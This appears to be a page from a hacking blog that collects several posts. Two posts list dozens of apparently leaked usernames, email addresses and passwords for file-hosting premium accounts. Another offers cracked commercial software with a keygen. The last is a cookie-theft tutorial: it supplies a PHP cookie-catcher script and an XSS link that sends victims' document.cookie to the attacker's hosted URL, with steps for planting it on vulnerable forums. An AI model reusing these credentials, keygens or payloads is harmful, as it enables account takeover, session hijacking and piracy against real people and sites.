Showing posts with label Cookie Hacking. Show all posts
Showing posts with label Cookie Hacking. Show all posts

WUpload, FileSonic, Hotfile & Mixed Premium Accounts (4-JAN-12) & Steps to Install Cookies

       
Wupload, FileSonic, Hotfile Premium Accounts

04-January-2012

Live Update (210 Bonus)
http://goo.gl/iU58D

Live Update
http://goo.gl/93D6p
Live Update
http://goo.gl/lBNo5

   --MİXED--  
Easy-Share--Turbobit--FileApe--MegaShare--


If you don't know how to use cookies then click on the link given below to know how to inject cookies  in
Google Chrome & Firefox.

If u liked this post then please subscribe to this blog via E-mail(on the right-hand side of this blog) and also please bookmark this blog....You can also follow me on Twitter (@vrkrulez) and Become a fan on Facebook: Freak Hacks and VRK - The Attitude Boy.

Keep Visiting! Just give it a try and don’t forget to drop your comments here.

Multi Premium Account Update (Dec-2011)


 
Multi Premium Account Update

Hi all users, as you know that Christmas is about to come, and we're going to be very busy on that day, so we have decided to do something new for you. This is a Christmas special post and this will always be on top of all the post until Christmas and here we will post fresh and latest premium accounts / cookies of the various file hosters according to thier availability.

Filesonic:-

User :palmtop2 
Pass :sshyaoay


User : rmead@comcast.net - 
Pass : moodew

User : stefan@palme.li
Pass : sshyaoay



User :duckati 
Pass :raa5314

User : profit32001@yahoo.com
Pass : profit2

User : duckati@gmail.com
Pass : raa5314


user-micham27@gmx.net
pass-1313lm

User: Nasirov-Elvin7
Pass: derby68

User: Nasirov-Elvin8
Pass: alucard1

User: 1980Stoddy
Pass: arsenal

User: np75fp
Pass: escapes

User: pksarea-3@yahoo.com
Pass: another1

Usar: arenaberjaya9@gmail.com
Pass: muzack

Usar: gjohnson300@gmail.com
Pass: frycook

Usar: Bobbins
Pass: bobbins

Usar: Leigh_7840
Pass: booyah

Usar: pracaprzykomputerze93@wp.pl
Pass: 742131 

Wupload:-

User: majik01@gmail.com
Pass: x1111x

User: blackgold76@hotmail.com
Pass: 032476 

User : ivansp10@hotmail.com 

Pass : crymax10 

User  : shbhspns357@hotmail.com
Pass : gongon

User : shbhspns357@hotmail.com
Pass : gongon

User : rmead@comcast.net
Pass : moodew

User : fairy@mixrelease.com 

Pass : mixrelease.com777965 
Hotfile:-

User: cloude77
Pass: metecem

User: youyoya
Pass: yh24071985 

User : rudeman67
Pass : awszzz

User : alperemre
Pass : aec1984 

If u liked this post then please subscribe to this blog via E-mail(on the right-hand side of this blog) and also please bookmark this blog....You can also follow me on Twitter (@vrkrulez) and Become a fan on Facebook: Freak Hacks and VRK - The Attitude Boy.

Keep Visiting! Just give it a try and don’t forget to drop your comments here.


KeyScrambler Premium 2.8.2.0 Full ($44.99 But Free)


KeyScrambler Premium 2.8.2.0 Full $44.99

KeyScrambler encrypts your keystrokes in the kernel and decrypts it at the destination application, leaving Keyloggers with indecipherable keys to record. For your personal office, family, and business, KeyScrambler adds a reliable layer of defense. It works even on security compromised computers. It is compatible with other security programs and authentication methods such as tokens and smart cards. It requires no effort on your part and lets you see encryption live.

For web browsing + work + play. KeyScrambler Pro protects all your inputs in IE, Firefox, Opera, and Flock, and nearly 80 other browsers and apps: Popular Browsers; Email Clients; IM/VoIP Clients; Password Managers; Zip Programs; Online Games; New! Text Editors...

Download KeyScrambler Premium Setup Here:-
 
Download KeyScrambler Premium Keymaker Here:-

If u liked this post then please subscribe to this blog via E-mail(on the right-hand side of this blog) and also please bookmark this blog....You can also follow me on Twitter (@vrkrulez) and Become a fan on Facebook: Freak Hacks and VRK - The Attitude Boy.

Keep Visiting! Just give it a try and don’t forget to drop your comments here.


What is Cookie Catcher and How to Get Cookies Using it


What is Cookie Catcher and How to Get Cookies Using it

Hello guys , hope you all are enjoying good health.So today I am going to discuss what this cookie catcher tool is and some basic concepts related to it.Hope yous guys like and If you have any problem in it do let me know in comments. 



What is a Cookie?

  • First of all we will see what is cookie.In simple words a cookie is a special thing which our web browser used to store our information such as user username , passwords, etc.
  • Like have you guys ever noticed when we log in to some account like Facebook and click on any page to open it in new tab then why don't we have to log in our username and password again.Even if we close our Facebook account and again open it still there is no need to log in your details again unless you log out your account.
  • This thing is done by cookie of our browser.It actually for our ease but think what happens if this cookie got steal,then someone can easily log in our account without even knowing the password.

What is a Cookie Catcher?

  • A cookie catcher tool is nothing but just a php script which captures our browser's cookies.
  • Hacker usually sends you a code or link and this link is connected to the cookie catcher.When someone clicks on that link,the cookie catcher works and captures all the cookies of the innocent victim and sends them to hacker.
Is making a Cookie Catcher Hard?

  • Now the question arises,is it difficult to make a cookie catcher as it looks like we have to do some php programming etc.
  • The answer is no , if you you basic knowledge of php,you can make cookie catcher very easily. 
  • In fact the hard part is to get someone to click on a link which contains your cookie catcher.
How to make a Cookie Catcher?

  • Copy the below code in a notepad :
<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");
?>
  • Save this notepad as CookieCatcher.php
  • Hurrah !!! You have created a cookie catcher.
How to use a Cookie Catcher?

  • Now the question arises how can we use a cookie catcher.
  • First of all create a free account on 0fees.net
  • After creating account open cpanel.0fees.net and log in to your account.
  • Now under File Management , click on Online File Manager .
  • Now open htdocs and upload the CookieCatcher.php file in it.
  • Now upload the below code in any site which is vulnerable to XSS like make a post in some forum.
<a onclick="document.location='http://YOUR-USER-NAME.0fees.net/cookiecatcher.php?cookie='+escape(document.cookie);" href="#"> click here </a>
  • Make sure to change user username .
  • After posting this will appear like a link and when someone clicks on that link , the cookie catcher automatically creates a file named Cookies.html in the same folder in your account and the cookies of that clicker will come to that file.
If u liked this post then please subscribe to this blog via E-mail(on the right-hand side of this blog) and also please bookmark this blog....You can also follow me on Twitter (@vrkrulez) and Become a fan on Facebook: Freak Hacks and VRK - The Attitude Boy.

Keep Visiting! Just give it a try and don’t forget to drop your comments here.